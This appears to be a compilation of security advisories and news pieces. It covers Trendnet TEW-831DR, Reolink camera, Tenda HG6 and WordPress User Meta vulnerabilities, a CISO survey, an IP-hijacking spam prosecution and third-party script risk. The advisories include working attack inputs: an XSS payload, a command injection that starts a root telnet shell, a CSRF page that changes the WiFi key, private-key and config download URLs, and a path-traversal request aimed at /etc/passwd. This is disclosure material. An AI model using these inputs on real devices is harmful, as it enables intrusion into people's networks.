An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

*   Technical Advisory: Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)
*   Technical Advisory: Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)
*   Technical Advisory: OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)
*   Technical Advisory: CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)
*   Technical Advisory: Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Technical Advisories:

**Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30326  
Severity: Medium 5.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

**Impact**

An attacker can use a simple XSS payload to crash the main page of the router web interface.

**Details**

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic\_conf page and create a popup on the 5G home.htm page:

    <input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30328  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

**Impact**

A malicious user can change the username and password of the interface.

**Details**

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

**OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30329  
Severity: Medium 6.3

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

**Impact**

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

**Details**

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

    192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

    user: root
    Password: the admin password 

Running the ls command will list the files in the current directory:

    bin   etc   init  mnt   root  tmp   var
    dev   home  lib   proc  sys   usr   web

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30327  
Severity: High 7.6

**Summary**

Trendnet TEW-831DR WiFi router is a general consumer WiFi router with a web interface for configuration. It was found that the routers browser interface is vulnerable to CSRF.

**Impact**

The WiFi router interface is vulnerable to CSRF. An attacker can change the pre-shared key to the WiFi router if the interface IP is known.

**Details**

Cross-Site Request Forgery is an attack that occurs when a user interacts with a malicious web application while logged into a vulnerable web application using the same browser. The malicious web application can send unwanted requests to the vulnerable web application.

If the user is logged into the router web interface an attacker could create a page like the example below and trick a user into clicking it to change the router WiFi pre-shared key or SSID.

e.g.:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://192.168.10.1/boafrm/formWizard" method="POST">
    
          <input type="hidden" name="pskValue0" value="password" />
          <input type="hidden" name="pskValue1" value="password" />
          <input type="hidden" name="cliPskValue0" value="password" />
          <input type="hidden" name="cliPskValue1" value="password" />
          <input type="hidden" name="apply" value="Save &amp; Apply" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30325  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the default pre-shared key for the WiFi networks is the same for every router but the last four digits.

**Impact**

The device default pre-shared key for both 2.4GHz and 5GHz networks can be guessed or brute-forced by an attacker within range of the WiFi network. The weak pre-shared key allows the attacker to gain access to these networks if the pre-shared key has been left unchanged from the factory default.

**Details**

The device default pre-shared key has the same seven out of eleven digits for every router. An attacker within scanning range of the WiFi network can brute-force the last four digits to gain access to the network.

e.g.:

    The first seven default characters of the pre-shared key:
    831R100

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners that are still using the default pre-shared key should update the current wifi key to new one through the web interface.

**Disclosure Timeline:**

March 15th, 2022: Initial email from NCC to Trendnet.

March 16th, 2022: Trendnet responded to the initial email.

March 18th, 2022: First communication of the bugs to Trendnet. Set the disclosure timeline to 60 days.

May 5th – May 23rd, 2022: Multiple emails exchanged to complete the fixes on the firmware version.

May 23rd, 2022: Trendnet confirmed the fixes were present in the firmware to be released.

June 2nd, 2022 – Trendnet released firmware version:v1.0(601.130.1.1410).

**Thanks to**

Nicolas Bidron, Jennifer Fernick, and David Goldsmith for their support throughout the research and disclosure process. Additionally, Trendnet for their on going cooperation.

**About NCC Group**

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

CVE-2022-30329: Technical Advisory – Multiple Vulnerabilities in Trendnet TEW-831DR WiFi Router (CVE-2022-30325, CVE-2022-30326, CVE-2022-30327, CVE-2022-30328, CVE-2022-30329)

While CISOs may feel more confident in their security posture emerging from the pandemic, new research suggests that doesn't mean organizations are better prepared for large-scale attacks.

Cybercrime reached heightened levels of intensity and sophistication in the past year. We saw greater complexity in ransomware, supply chain, and critical infrastructure attacks. Despite the threat escalation, CISOs feel more confident in their security posture. But does that feeling of confidence actually translate into organizations being better prepared for large-scale attacks? New research suggests that is not the case.

The "2022 Voice of the CISO" report, Proofpoint's global survey of 1,400 CISOs, found that only 48% are concerned about their organization suffering a material cyberattack in the next 12 months, a sharp drop from the previous year's 64%. This shift reveals CISOs feel more in control, even as new events such as the Great Resignation and geopolitical tensions in Europe are elevating their stress levels.

But the increased confidence of CISOs shows a disconnect with their actual preparedness — despite their greater trust in themselves, 50% acknowledge their organization is not prepared to cope with a targeted attack. This misalignment shows that CISOs have simply reached a state of relative tranquility after the disruption of the pandemic. The psychological effects of the chaos are finally wearing off.

Having met the pressure to react quickly and shore up resources to support remote work in 2020, CISOs accepted the realities of our new world of elevated cyber threats. But once the pandemic demands eased up, new, pressing issues developed — and CISOs accepted their new normal of always operating at high alert.

**CISOs Adapt but Vulnerabilities Remain**

As CISOs moved to adapt to the new realities of their job, insider threats became their biggest concern, rising from the third spot in 2020 to the top in 2021. The increased awareness about insider threats likely played a big part in this change, especially in the life sciences sector, where vaccine research received prominent media attention. Pfizer is one example. The company filed a highly publicized lawsuit against an employee who allegedly stole trade secrets pertaining to the company's vaccines and medications.

Geopolitical tension also contributed to concerns about insider threat. Last year, for instance, the FBI warned technology companies that employees with ties to China and Russia may spy on them. And let's not forget that negligent insiders pose almost as big a threat — CISOs ranked negligent, malicious, and compromised insiders as nearly equal risks in terms of breach exposure.

Data protection is at the heart of the challenge, especially given the impact of the Great Resignation and hybrid work. Some 56% of surveyed CISOs still view human error as the biggest threat to their organization, with compromised insiders as the most likely vector. The ongoing transition, as employees continue to leave or return to the workplace, exacerbates the insider threat, making data protection an even more urgent priority.

**Finally, a Seat at the Table — With Mixed Results**

Ransomware is another threat that received media attention last year, forcing C-suites finally to take notice of these high-profile attacks. In the past, CISOs often had to plan special strategies to gain an audience with the board. Corporate directors and top officers viewed CISOs as simply technologists, relegating cybersecurity to a mere IT problem. Today, CISOs are finally getting a seat at the table. This is an encouraging change.

With their role now elevated, CISOs are also subject to a higher level of job expectations. Only 49% feel the expectations of their role are excessive, compared with 57% in the previous year's study. This may be another indicator of the post-pandemic calm, leaving CISOs feeling less pressured yet more in control.

Unfortunately, the rise in prominence of the CISO's role does not mean that security leaders feel more supported by their organizations. There was only a slight decrease in the number of CISOs who see eye-to-eye with their boards (52% in 2021 vs. 54% in 2020).

This strain in their relationship will continue to impact the effectiveness of CISOs in making cybersecurity a strategic part of their organization's business objectives — and the survey data show the implications of this struggle. For instance, 42% of surveyed organizations still do not have a ransomware policy in place. Although this threat has been on CISOs' radar for a long time, it took the nonstop media coverage in the past year for boards and executives to finally pay attention. They are just now viewing their CISOs as risk or business strategists.

**Bolstering Defenses Is Vital in the New Workplace**

As organizations acclimate to the new ways of operating in a post-pandemic world, CISOs are ready to leave uncertainty in their rearview mirror. But is this the calm before the next storm?

With geopolitical tensions mounting in Europe and other areas of the globe, targeted attacks, insider threats, and critical infrastructure risks keep rising. While CISOs are much more confident in their cybersecurity posture, bolstering defenses remains a critical imperative.

Organizations have emerged from the pandemic as transformed workplaces, and strengthening the human perimeter is especially critical in this evolved, hybrid environment. Now that CISOs have a voice, they are in a stronger position to make the case for better organizational preparedness. Considering that people remain the biggest risk factor, making the argument for closing the gaps in the human perimeter must remain at the top of every CISO's agenda.

CISOs Gain False Confidence in the Calm After the Storm of the Pandemic

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

CVE-2022-24127: REDCap Change Log - Eastern Virginia Medical School (EVMS), Norfolk, Hampton Roads

On the eve of their federal criminal trial for allegedly stealing vast swaths of Internet addresses for use in large-scale email spam campaigns, three current or former executives at online advertising firm Adconion Direct have agreed to plead guilty to lesser misdemeanor charges of fraud and misrepresentation via email.

At the outset of their federal criminal trial for hijacking vast swaths of Internet addresses for use in large-scale email spam campaigns, three current or former executives at online advertising firm **Adconion Direct** (now **Amobee**) have pleaded guilty to lesser misdemeanor charges of fraud and misrepresentation via email.

In October 2018, prosecutors in the Southern District of California named four Adconion employees — **Jacob Bychak**, **Mark Manoogian**, **Petr Pacas**, and **Mohammed Abdul Qayyum** —  in a ten-count indictment (PDF) on felony charges of conspiracy, wire fraud, and electronic mail fraud.

The government alleged that between December 2010 and September 2014, the defendants engaged in a conspiracy to identify or pay to identify blocks of Internet Protocol (IP) addresses that were registered to others but which were otherwise inactive.

Prosecutors said the men also sent forged letters to an Internet hosting firm claiming they had been authorized by the registrants of the inactive IP addresses to use that space for their own purposes.

All four defendants pleaded not guilty when they were charged back in 2018, but this week Bychak, Manoogian and Qayyum each entered a plea deal.

“The defendants’ jobs with Adconion were to acquire fresh IP addresses and employ other measures to circumvent the spam filters,” reads a statement released today by the U.S. Attorney for the Southern District of California, which said the defendants would pay $100,000 in fines each and perform 100 hours of community service.

“To conceal Adconion’s ties to the stolen IP addresses and the spam sent from these IP addresses, the defendants used a host of DBAs, virtual addresses, and fake names provided by the company,” the statement continues. “While defendants touted ties to well-known name brands, the email marketing campaigns associated with the hijacked IP addresses included advertisements such as ‘BigBeautifulWomen,’ ‘iPhone4S Promos,’ and ‘LatinLove\[Cost-per-Click\].'”

None of the three plea agreements are currently available on PACER, the online federal court document clearinghouse. However, PACER does show that on June 7 — the same day the pleas were entered by the defendants —  the government submitted to the court a superseding set of just two misdemeanor charges (PDF) of fraud in connection with email.

Another document filed in the case says the fourth defendant — Pacas — accepted a deferred prosecution deal, which includes a probationary period and a required $50,000 “donation” to a federal “crime victims fund.”

There are fewer than four billion so-called “Internet Protocol version 4” or IPv4 addresses available for use, but the vast majority of them have already been allocated. The global dearth of available IP addresses has turned them into a commodity wherein each IP can fetch between $15-$25 on the open market.

This has led to boom times for those engaged in the acquisition and sale of IP address blocks, but it has likewise emboldened those who specialize in absconding with and spamming from dormant IP address blocks without permission from the rightful owners.

In May, prosecutors published information about the source of some IP address ranges from which the Adconion employees allegedly spammed. For example, the government found the men leased some of their IP address ranges from a Dutch company that’s been tied to a scandal involving more than four million addresses siphoned from the **African Network Information Centre** (AFRINIC), the nonprofit responsible for overseeing IP address allocation for African organizations.

In 2019, AFRINIC fired a top employee after it emerged that in 2013 he quietly commandeered millions of IPs from defunct African entities or from those that were long ago acquired by other firms, and then conspired to sell an estimated $50 million worth of the IPs to marketers based outside Africa.

“Exhibit A” in a recent government court filing shows that in 2013 Adconion leased more than 65,000 IP addresses from **Inspiring Networks**, a Dutch network services company. In 2020, Inspiring Networks and its director **Maikel Uerlings** were named in a dogged, multi-part investigation by South African news outlet **MyBroadband.co.za** and researcher Ron Guilmette as one of two major beneficiaries of the four million IP addresses looted from AFRINIC by its former employee.

Exhibit A, from a May 2022 filing by U.S. federal prosecutors.

The address block in the above image — 196.246.0.0/16 — was reportedly later reclaimed by AFRINIC following an investigation. Inspiring Networks has not responded to requests for comment.

Prosecutors allege the Adconion employees also obtained hijacked IP address blocks from **Daniel Dye**, another man tied to this case who was charged separately. For many years, Dye was a system administrator for **Optinrealbig**, a Colorado company that relentlessly pimped all manner of junk email, from mortgage leads and adult-related services to counterfeit products and Viagra. In 2018, Dye pleaded guilty to violations of the CAN-SPAM Act.

Optinrealbig’s CEO was the spam king Scott Richter, who changed the name of the company to Media Breakaway after being successfully sued for spamming by **AOL,** **Microsoft**, **MySpace**, and the New York Attorney General Office, among others. In 2008, this author penned a column for The Washington Post detailing how Media Breakaway had hijacked tens of thousands of IP addresses from a defunct San Francisco company for use in its spamming operations.

The last-minute plea deals by the Adconion employees were reminiscent of another recent federal criminal prosecution for IP address sleight-of-hand. In November 2021, the CEO of South Carolina technology firm **Micfo** pleaded guilty just two days into his trial, admitting 20 counts of wire fraud in connection with an elaborate network of phony companies set up to obtain more than 700,000 IPs from the **American Registry for Internet Numbers** (ARIN) — AFRINIC’s counterpart in North America.

Adconion was acquired in June 2014 by **Amobee**, a Redwood City, Calif. online ad platform that has catered to some of the world’s biggest brands. Amobee’s parent firm — Singapore-based communications giant Singtel — bought Amobee for $321 million in March 2012.

But as _Reuters_ reported in 2021, Amobee cost Singtel nearly twice as much in the last year alone — $589 million — in a “non-cash impairment charge” Singtel disclosed to investors. Marketing industry blog **Digiday.com** reported in February that Singtel was seeking to part ways with its ad tech subsidiary.

One final note about Amobee: In response to my 2019 story on the criminal charges against the Adconion executives, Amobee issued a statement saying “Amobee has fully cooperated with the government’s investigation of this 2017 matter which pertains to alleged activities that occurred years prior to Amobee’s acquisition of the company.”

Yet as the government’s indictment points out, the alleged hijacking activities took place up until September 2014, which was _after_ Amobee’s acquisition of Adconion Direct in June 2014. Also, the IP address ranges that the Adconion executives were prosecuted for hijacking were all related to incidents in 2013 and 2014, which is hardly “years prior to Amobee’s acquisition of the company.”

Amobee has not yet responded to requests for comment.

Adconion Execs Plead Guilty in Federal Anti-Spam Case

A vulnerability classified as critical has been found in SevOne Network Management System up to 5.7.2.22. This affects the file traceroute.php of the Traceroute Handler. The manipulation leads to privilege escalation with a command injection. It is possible to initiate the attack remotely.

CVE-2020-36529

Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a configuration disclosure vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Reolink E1 Zoom Camera  
Vendor URL:     https://reolink.com/product/e1-zoom/  
Type:           Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]  
Date found:     2021-08-26  
Date published: 2022-06-01  
CVSSv3 Score:   5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
CVE:            CVE-2021-40150

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Reolink E1 Zoom Camera 3.0.0.716 (latest) and below

4. INTRODUCTION  
===============  
Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD  
& optical zoom are added into this compact camera. Plus two-way audio, remote  
live view and more smart capacities help you connect with what you care. Be  
closer to families and be away from worries.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration  
via the /conf/ directory that is mapped to a publicly accessible path.

An unauthenticated attacker can abuse this with network-level access to the  
camera to download the entire NGINX/FastCGI configurations by querying, i.e.:

http://[CAM-IP]/conf/nginx.conf  
http://[CAM-IP]/conf/fastcgi.conf

Etc.

6. RISK  
=======  
An unauthenticated attacker can download the webserver's configuration files  
which might lead to sensitive information disclosure.

7. SOLUTION  
===========  
None.

8. REPORT TIMELINE  
==================  
2021-08-26: Discovery of the vulnerability  
2021-08-26: Sent notification to Reolink via their support channel  
2021-08-26: Response from vendor asking for vulnerability details  
2021-08-26: Sent all the vulnerability details  
2021-08-31: Vendor is still looking into the issue  
2021-09-03: Vendor states that the issue will be fixed with the next firmware update by the end of September.  
2021-10-01: Since no firmware has been released, we've sent another notification  
2021-10-02: Vendor states that the new firmware is delayed  
2022-02-01: Since there is still fix, sent another notification  
2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.  
2022-03-03: Since there is still fix, sent another notification  
2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)  
2022-05-24: Since there is still fix, sent another notification  
2022-05-24: Vendor states that the update still hasn't been released yet.  
2022-06-01: Almost a year should be enough to fix this. Public disclosure.

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

Reolink E1 Zoom Camera 3.0.0.716 Configuration Disclosure

Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key disclosure vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Reolink E1 Zoom Camera  
Vendor URL:     https://reolink.com/product/e1-zoom/  
Type:           Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]  
Date found:     2021-08-26  
Date published: 2022-06-01  
CVSSv3 Score:   7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)  
CVE:            CVE-2021-40149

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Reolink E1 Zoom Camera 3.0.0.716 (latest) and below

4. INTRODUCTION  
===============  
Meet new generation of Reolink E1 series. Advanced features - 5MP Super  
HD & optical zoom are added into this compact camera. Plus two-way audio,  
remote live view and more smart capacities help you connect with what you  
care. Be closer to families and be away from worries.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private  
key via the root web server directory.

An unauthenticated attacker can abuse this with network-level access to the  
camera to download the webserver's private SSL key by simply going to the  
following URL:

http://[CAM-IP]/self.key

6. RISK  
=======  
An unauthenticated attacker can download the webserver's SSL private key and  
thereby attack the encrypted network traffic to and from the camera, which might  
lead to the disclosure of the administrative access credentials and other  
sensitive information.

7. SOLUTION  
===========  
None.

8. REPORT TIMELINE  
==================  
2021-08-26: Discovery of the vulnerability  
2021-08-26: Sent notification to Reolink via their support channel  
2021-08-26: Response from vendor asking for vulnerability details  
2021-08-26: Sent all the vulnerability details  
2021-08-31: Vendor is still looking into the issue  
2021-09-03: Vendor states that the issue will be fixed by the end of September.  
2021-10-01: Since no firmware has been released, we've sent another notification  
2021-10-02: Vendor states that the new firmware is delayed  
2022-02-01: Since there is still fix, sent another notification  
2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.  
2022-03-03: Since there is still fix, sent another notification  
2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)  
2022-05-24: Since there is still fix, sent another notification  
2022-05-24: Vendor states that the update still hasn't been released yet.  
2022-06-01: Almost a year should be enough to fix this. Public disclosure.

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

Reolink E1 Zoom Camera 3.0.0.716 Private Key Disclosure

Tenda Technology Co.,Ltd HG6 3.3.0-210926 was discovered to contain a command injection vulnerability via the pingAddr and traceAddr parameters. This vulnerability is exploited via a crafted POST request.

Title: Tenda HG6 v3.3.0 Remote Command Injection Vulnerability  
Advisory ID: ZSL-2022-5706  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 03.05.2022

**Summary**

HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1\*GE,3\*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications.

**Description**

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

**Vendor**

Tenda Technology Co.,Ltd. - https://www.tendacn.com

**Affected Version**

Firmware version: 3.3.0-210926  
Software version: v1.1.0  
Hardware Version: v1.0  
Check Version: TD\_HG6\_XPON\_TDE\_ISP

**Tested On**

Boa/0.93.15

**Vendor Status**

\[22.04.2022\] Vulnerability discovered.  
\[26.04.2022\] Vendor contacted.  
\[01.05.2022\] No response from the vendor.  
\[03.05.2022\] Public security advisory released.

**PoC**

tenda\_hg6\_cmdinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/166932/Tenda-HG6-3.3.0-Remote-Command-Injection.html  
\[2\] https://cxsecurity.com/issue/WLB-2022050009  
\[3\] https://exchange.xforce.ibmcloud.com/vulnerabilities/225715  
\[4\] https://sploitus.com/exploit?id=ZSL-2022-5706  
\[5\] https://www.exploit-db.com/exploits/50916  
\[6\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30425  
\[7\] https://nvd.nist.gov/vuln/detail/CVE-2022-30425

**Changelog**

\[03.05.2022\] - Initial release  
\[09.05.2022\] - Added reference \[1\], \[2\], \[3\] and \[4\]  
\[13.05.2022\] - Added reference \[5\]  
\[29.05.2022\] - Added reference \[6\] and \[7\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2022-30425: Zero Science Lab » Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

WordPress User Meta Lite and Pro plugin versions 2.4.3 and below suffer from a path traversal vulnerability.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        User Meta  
Vendor URL:     https://wordpress.org/plugins/user-meta  
Type:           Relative Path Traversal [CWE-23]  
Date found:     2022-02-28  
Date published: 2022-05-24  
CVSSv3 Score:   4.3 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)  
CVE:            CVE-2022-0779

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
User Meta Lite 2.4.3 and below  
User Meta Pro 2.4.3 and below

4. INTRODUCTION  
===============  
An easy-to-use user profile and management plugin for WordPress that allows  
user login, reset-password, profile update and user registration with extra  
fields, all on front-end and many more. User Meta Pro is a versatile user  
profile builder and user management plugin for WordPress that has the most  
features on the market. User Meta aims to be your only go to plugin for  
user management.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The WordPress ajax action "um_show_uploaded_file" is vulnerable to an  
authenticated path traversal when user-supplied input to the HTTP POST  
parameter "filepath" is processed by the web application. Since the application  
does not properly validate and sanitize this parameter, it is possible to  
enumerate local server files using a blind approach. This is because the  
application doesn't return the contents of the referenced file but instead  
returns different form elements based on whether a file exists or not.

The following Proof-of-Concept triggers this vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: localhost  
Content-Length: 147  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Cookie: [your-wordpress-auth-cookies]  
Connection: close

field_name=[your-field-name]&filepath=/../../../../../etc/passwd&field_id=[your-field-id]&form_key=[your-form-key]&action=um_show_uploaded_file&pf_nonce=[your-auth-nonce]&is_ajax=true

6. RISK  
=======  
The vulnerability can be used by an authenticated attacker to enumerate  
local server files based on a blind approach.

7. SOLUTION  
===========  
Update to User Meta/User Meta Pro 2.4.4

8. REPORT TIMELINE  
==================  
2022-02-28: Discovery of the vulnerability  
2022-02-28: WPScan (CNA) assigns CVE-2022-0779  
2022-03-03: Contacted the vendor via their contact form  
2022-03-06: Vendor response, acknowledgement of the issue  
2022-03-18: Version 2.4.2 is released  
2022-03-22: Vulnerability is still exploitable since fix was applied only client-side. Contacted vendor again.  
2022-04-13: No response, contacted vendor again  
2022-04-18: Vendor added a new fix to version 2.4.3. Asked to retest.  
2022-04-19: Vulnerability is still exploitable due to a logic bug in the fix. Contacted vendor again.  
2022-04-29: Vendor asks whether another fix in version 2.4.4 is fine  
2022-05-16: Fix seems to work  
2022-05-24: Public disclosure

9. REFERENCES  
=============  
https://github.com/MrTuxracer/advisories

WordPress User Meta Lite / Pro 2.4.3 Path Traversal

Nearly half of the world's largest websites use externally generated JavaScript that makes them ripe targets for cyberattackers interested in stealing data, skimming credit cards, and executing other malicious actions.

Many organizations may be significantly more vulnerable to risks from third-party JavaScript in their websites than they think.

New analysis from Source Defense finds there to be a high prevalence of third-party (and even fourth-party) scripts on most websites — which is concerning because of the relative ease with which they could be used to sneak in malicious code. 

Typically, when a webpage calls a third-party script, it is loaded directly into a browser from an external server belonging to the third party. This means the script bypasses controls such as perimeter and Web application firewalls and network monitoring tools, according to the security vendor. The process gives threat actors a way to introduce malicious code into the environment via third-party scripts. The problem is exacerbated by the fact that developers of third-party scripts often include code from other developers that in many cases have sourced code from another developer, Source Defense said.

Yet most organizations use third-party scripts for integrating shopping carts, dynamic forms, processing orders and payments, presenting social media buttons, visitor tracking, and a variety of other functions. The scripts are readily available — often for free — from numerous sources, including open source organizations, social media companies, cloud providers, advertising networks, and content delivery networks, the Source Defense report says.

In an analysis of 4,300 of the world's largest websites, the firm found that each site had 15 externally generated scripts on average — with an average of 12 of them on sensitive pages, such as those for collecting user information or for processing orders and payments. Nearly half (49%) of the websites in Source Defense's study had external code with functionality for retrieving form input and monitoring users' button clicks. More than 20% had external code that could modify forms. Most sites had multiple scripts on every single webpage.

Source Defense found that websites belonging to organizations in some sectors had a substantially higher than average number of third-party scripts than others. Financial services websites, for instance, had an average of 19 scripts on sensitive pages, or 60% more than the average across all sectors. Healthcare organizations had 15 of them on average.

**A Tempting Attack Vector for Adversaries**

"Adversaries remain hyper-focused on data theft from websites that conduct transactions or capture sensitive data," says Hadar Blutrich, CTO and co-founder of Source Defense.

In recent years, there have been numerous incidents where attackers have manipulated or used third-party scripts to steal user and payment card data, to redirect users to malicious sites, log keystrokes, and carry out a variety of other malicious activity. One well-known example is Magecart, a hacker collective that over the years has pilfered data on hundreds of millions of payment cards by sneaking card-skimming software into third-party scripts on retail websites. 

Such attacks can have big consequences for businesses. For example, in one incident in 2018, Magecart hackers sneaked a few lines of code into a British Airways website page that ended up exposing personal data belonging to some 380,000 customers. The airline was later hit was a massive fine of more than $200 million over the incident.  

"The attack vector remains broad and open for even the world's largest sites, and the risk of significant material loss is quite real," Blutrich says.

To compromise third-party scripts, threat actors sometimes infiltrate public code repositories, he notes. In other instances, they identify organizations that have large networks of clients and compromise scripts from those organizations to perpetrate one-to-many attacks, he says. As one example, Blutrich points to an attack earlier this year in which over 100 sites related to real estate were compromised after an attack planted malware in a cloud-video component on a site belonging to Sotheby's real-estate arm.

**How to Combat External Script Risk**

The maturity of enterprise processes for mitigating risk from third- and fourth-party scripts tends to vary, Blutrich notes. In some instances, there's no oversight: Digital and marketing teams act on their own to implement new website functionality and engage with third parties, without involving the enterprise security team. 

However, "in more mature cases, we've heard of 'script councils' being in place where digital must work with security/compliance to vet and approve any supply chain partners," he says.

Regardless of the internal processes for approval, more must be done for managing and securing the script, Blutrich says. "Once on the site, even if approved, benign changes from the partners themselves may jeopardize compliance and, obviously, malicious changes from threat actors can lead to major data theft and fraud concerns."

Tag

#acer